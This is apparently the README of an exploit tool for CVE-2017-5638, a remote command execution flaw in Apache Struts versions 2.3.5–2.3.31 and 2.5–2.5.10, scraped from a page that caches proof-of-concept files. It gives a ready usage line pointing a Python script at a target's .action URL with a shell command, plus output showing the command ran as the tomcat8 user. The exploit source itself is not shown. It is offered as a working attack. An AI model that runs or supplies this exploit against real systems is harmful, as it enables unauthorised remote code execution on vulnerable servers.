A exploit for CVE-2017-5638. This exploit works on versions 2.3.5-2.3.31 and 2.5 – 2.5.10# CVE-2017-5638-ApacheStruts2.3.5
A exploit for CVE-2017-5638. This exploit works on versions 2.3.5-2.3.31 and 2.5 – 2.5.10
# Requirements
optparse, requests
# Usage
This exploit can be used like this:
```bash
$ python3 CVE-2017-5638ApacheStruts.py -u http://10.129.187.188:8080/Monitoring/example/Welcome.action -c id
b'uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)'
```
For it to work you have to point to an .action file
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view